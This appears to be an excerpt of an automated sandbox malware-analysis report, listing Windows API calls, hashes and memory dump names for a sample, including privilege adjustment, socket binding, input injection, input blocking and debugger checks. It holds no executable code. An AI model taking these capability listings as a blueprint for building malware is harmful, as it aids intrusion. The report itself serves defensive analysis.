                                                                                                                                                                              • Instruction ID: 235bf9e28edbcfd5426c33f701787a5e50cfee3a0f885b79401be072835efb7b
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ce0c0af598311cb80008f14e07e9c43f2718f20f02cfb337e6d84c40e37cc2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 938106B1108484BEEA29763F4C9DE7F299EDB47300F19050DF182D7996CA9ACF42D276
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DE56C2,?,?,00000000,00000000), ref: 00E13A1E
                                                                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DE56C2,?,?,00000000,00000000), ref: 00E13A35
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00DE56C2,?,?,00000000,00000000,?,?,?,?,?,?,00DA66CE), ref: 00E13A45
                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00DE56C2,?,?,00000000,00000000,?,?,?,?,?,?,00DA66CE), ref: 00E13A56
                                                                                                                                                                              • LockResource.KERNEL32(00DE56C2,?,?,00DE56C2,?,?,00000000,00000000,?,?,?,?,?,?,00DA66CE,?), ref: 00E13A65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                              • String ID: SCRIPT
                                                                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                                                                              • Opcode ID: d9145db21d8a0b532ee50609597c9065473a3780b7740efc6826c576aaf7ac54
                                                                                                                                                                              • Instruction ID: f8d3653491c893339133abfce1c4e5bf2d5fdc5dac53438195ec09d2f4de0312
                                                                                                                                                                              • Opcode Fuzzy Hash: d9145db21d8a0b532ee50609597c9065473a3780b7740efc6826c576aaf7ac54
                                                                                                                                                                              • Instruction Fuzzy Hash: B011A970200305BFE7208B26EC48F677BB9EFC4B45F1042ACB452E62A0DB71EC408A60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E01900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E01916
                                                                                                                                                                                • Part of subcall function 00E01900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E01922
                                                                                                                                                                                • Part of subcall function 00E01900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E01931
                                                                                                                                                                                • Part of subcall function 00E01900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E01938
                                                                                                                                                                                • Part of subcall function 00E01900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E0194E
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00E01C81), ref: 00E020FB
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E02107
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00E0210E
                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E02127
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00E01C81), ref: 00E0213B
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E02142
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3008561057-0
                                                                                                                                                                              • Opcode ID: a96068b501ee499ba1d39d206558c78ef8ffc3f24e5ca6b2fd027098b3508666
                                                                                                                                                                              • Instruction ID: 30f19689da4abbde320a6a628bdda8bf1943dcf475091636e3dd1b401b9e4bda
                                                                                                                                                                              • Opcode Fuzzy Hash: a96068b501ee499ba1d39d206558c78ef8ffc3f24e5ca6b2fd027098b3508666
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D11BE71502208FFDB149FA5DC0DBAE7BBAEF44359F14805CEA81B71A0C7369984DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E1A5BD
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E1A6D0
                                                                                                                                                                                • Part of subcall function 00E142B9: GetInputState.USER32 ref: 00E14310
                                                                                                                                                                                • Part of subcall function 00E142B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E143AB
                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E1A5ED
                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E1A6BA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1972594611-438819550
                                                                                                                                                                              • Opcode ID: 77cd73f662bf5a9ce522de880666024eb345f3fcb02ad0ef2079526a89a956eb
                                                                                                                                                                              • Instruction ID: ca008169a84c9cb53aeeb2c4b9123289f128feca39b23d81ca1868881e12f574
                                                                                                                                                                              • Opcode Fuzzy Hash: 77cd73f662bf5a9ce522de880666024eb345f3fcb02ad0ef2079526a89a956eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 8541307190520A9FCF14DFA4DC49AEEBBB9FF05314F285166E805B21A1EB319E84CF61
APIs
  • Part of subcall function 00E23AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E23AD7
  • Part of subcall function 00E23AAB: _wcslen.LIBCMT ref: 00E23AF8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E222BA
• WSAGetLastError.WSOCK32 ref: 00E222E1
• bind.WSOCK32(00000000,?,00000010), ref: 00E22338
• WSAGetLastError.WSOCK32 ref: 00E22343
• closesocket.WSOCK32(00000000), ref: 00E22372
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 1254dbf214fc05b406902172efed97188880debbc0ffabaa7aee75e94d5d17d8
• Instruction ID: 4e42f931d9cafb95a4c40fb6be088b8b7dcf59cc6fea44306fe90ddb69c8239b
• Opcode Fuzzy Hash: 1254dbf214fc05b406902172efed97188880debbc0ffabaa7aee75e94d5d17d8
• Instruction Fuzzy Hash: 0851B075A00210AFE710AF24D886F6A7BA5EB45718F48848CF906AF2D3C775AD418BB1
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: e0858e197094ecb40adc651de3cf153011725720d5467d69661429bf83d5843a
• Instruction ID: dbcc8702cdb63a703e1fdc81a6fe06a0fc649110eb439c942dc15427a8acd5a5
• Opcode Fuzzy Hash: e0858e197094ecb40adc651de3cf153011725720d5467d69661429bf83d5843a
• Instruction Fuzzy Hash: CE21D1317042109FD7119F26D848B5A7FE9FF85318F19946EE989AB252C771EC42CBA0
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00E1D8CE
• GetLastError.KERNEL32(?,00000000), ref: 00E1D92F
• SetEvent.KERNEL32(?,?,00000000), ref: 00E1D943
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
• Opcode ID: 1dc038a13d2b25bc12070e873460540c8c57fd7134d4db55bdc6d08fcde3a5e4
• Instruction ID: 0c385f0190b560ed5e526de60aabdf97c5966a042cb559c0ca9eefe836fa54d1
• Opcode Fuzzy Hash: 1dc038a13d2b25bc12070e873460540c8c57fd7134d4db55bdc6d08fcde3a5e4
• Instruction Fuzzy Hash: 182190B1508705AFE7209F66DD48BEB77FCEB80318F10541EE546B2151D7B4EA84CB60
APIs
• lstrlenW.KERNEL32(?,00DE46AC), ref: 00E0E482
• GetFileAttributesW.KERNEL32(?), ref: 00E0E491
• FindFirstFileW.KERNEL32(?,?), ref: 00E0E4A2
• FindClose.KERNEL32(00000000), ref: 00E0E4AE
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: 4760bbcbbfdee37b5825d0d663cf22f5ede28c57e3814f63445c42611ba53309
• Instruction ID: 77e7096c72cd3d5b7b85bbc8f595a72c94ed520b58fa10a7a48d8ab3d0202702
• Opcode Fuzzy Hash: 4760bbcbbfdee37b5825d0d663cf22f5ede28c57e3814f63445c42611ba53309
• Instruction Fuzzy Hash: 85F0E5308189185BD210673CBC0D8AB7B6DAF02339B504B51F836E22F0D7789DD99695
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: 96a4a29f2c62bf92a7eea200030cbb558269cbf5fa96328d1fab778749c83838
• Instruction ID: 84738751a877a55e7cc14b88612c5e7259a015b411cec7303560b04703186efe
• Opcode Fuzzy Hash: 96a4a29f2c62bf92a7eea200030cbb558269cbf5fa96328d1fab778749c83838
• Instruction Fuzzy Hash: 80D012B1C0810CEACB8097909D48DF9737DAB28700F11CD62FA86E1060E624DA089731
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00DD2A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00DD2A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00DD2AA1
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 970d90d188f66a8c0b45701c226d5993cc9a3802bae6e923a86d40ffe8a71a1c
• Instruction ID: 82d6699f6358383f2070ec20a55f495b86a67fde44dfa243139d50123afadd42
• Opcode Fuzzy Hash: 970d90d188f66a8c0b45701c226d5993cc9a3802bae6e923a86d40ffe8a71a1c
• Instruction Fuzzy Hash: C631D57494122D9BCB21DF68DD88B9DBBB8EF18310F5041DAE81CA7260EB309F858F55
APIs
  • Part of subcall function 00DC014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09D8
  • Part of subcall function 00DC014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09F5
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0205A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E02087
• GetLastError.KERNEL32 ref: 00E02097
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 5dbb8a83eea27afcd2f567d254d6635d58cc7085295436f301a062d916549a50
• Instruction ID: a907eb38f92965b0de5727ff17e20c171d5b5b3f41ce541b519324b896b32ea8
• Opcode Fuzzy Hash: 5dbb8a83eea27afcd2f567d254d6635d58cc7085295436f301a062d916549a50
                                                                                                                                                                              • Instruction Fuzzy Hash: 0011BFB1814305AFE7189F54EC8AE6BBBF8EB04710B20841EF546A3291DB70BC81CA20
APIs
• GetCurrentProcess.KERNEL32(?,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002,00000000), ref: 00DC5079
• TerminateProcess.KERNEL32(00000000,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002,00000000), ref: 00DC5080
• ExitProcess.KERNEL32 ref: 00DC5092
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 263ba74c8f6c99d70c4581edc5c7451ef72e2e07dc4e095f525cf891b310f100
• Instruction ID: b1f37310479a11c0b0da2b44823f052a1c7740a3fc0a6f9ae43ea80ba037f2a0
• Opcode Fuzzy Hash: 263ba74c8f6c99d70c4581edc5c7451ef72e2e07dc4e095f525cf891b310f100
• Instruction Fuzzy Hash: 02E04632000508AFCF216F61ED0CE483F6AEB50381F044018F809AB121DB35ED86DAE0
APIs
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E0ED04
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: mouse_event
• String ID: DOWN
• API String ID: 2434400541-711622031
• Opcode ID: a7a0122105e15669b61fcb986d6b77318d1a82d4816b1ac88bba4d477af6c416
• Instruction ID: da23383efb3fe33abf3b780059fa59a286399779c4971df342eb552f54ced3be
• Opcode Fuzzy Hash: a7a0122105e15669b61fcb986d6b77318d1a82d4816b1ac88bba4d477af6c416
• Instruction Fuzzy Hash: 8BE08C262ED76638F90421287C16FF6434CCF32B78B11265AF801F52C0ED925CC250B8
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00DFE664
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: a35b8756ba05659b4afeadc62497d11e8dc9ca1c5baef98299161a30eb51af3d
• Instruction ID: 6dad2d895d5fda2a49d703175438272888307e91b9a0b3570a48d43821428d0a
• Opcode Fuzzy Hash: a35b8756ba05659b4afeadc62497d11e8dc9ca1c5baef98299161a30eb51af3d
• Instruction Fuzzy Hash: 1FD0C9B480511DEACB80CB60EC88DD9777DBB04304F108A51F186E2040D730D6488F20
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14229
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14239
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 838b7106668a935660aa9d422f689729d9b86323367b1db0961ba039b9e492c4
• Instruction ID: 146cc08bc58bd718de132ed980e2f858fc64a19a01bf7430147c5a4f48baff5e
• Opcode Fuzzy Hash: 838b7106668a935660aa9d422f689729d9b86323367b1db0961ba039b9e492c4
• Instruction Fuzzy Hash: CAF0E5706043286AEB2027A6AC4DFFB3A6DEFC9761F000175F505E22D1D9709D84C6B1
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E0BC24
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E0BC37
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 2b55d5cead0f1b33cfebe9a94b549b41728bd4f043a33d5fb7d92800af4e8e1f
• Instruction ID: 36510130a37f996e90e1fefe2ed1f149e86f76d82e0e59330aedda159aa80695
• Opcode Fuzzy Hash: 2b55d5cead0f1b33cfebe9a94b549b41728bd4f043a33d5fb7d92800af4e8e1f
• Instruction Fuzzy Hash: C7F06D7180424DAFEB019FA1D809BFEBFB4FF04309F00900AF951A5191C3798215DF94
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E01B48), ref: 00E01A20
• CloseHandle.KERNEL32(?,?,00E01B48), ref: 00E01A35
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 4573f105d3f07a01cf6f26f6706341db578256113daddb6ee2343f1e3a143e5d
• Instruction ID: 532568c963e3239dc451c8292454b490cd361bfc74aedc9e1b134565aa4aaf0e
• Opcode Fuzzy Hash: 4573f105d3f07a01cf6f26f6706341db578256113daddb6ee2343f1e3a143e5d
• Instruction Fuzzy Hash: 7DE04F72018611EFE7252B11FC09F72BBA9EB04310F14891DF495D14B0DB626CA0DB20
APIs
• BlockInput.USER32(00000001), ref: 00E1F51A
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00DC075E), ref: 00DC0D4A
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• DeleteObject.GDI32(00000000), ref: 00E2358D
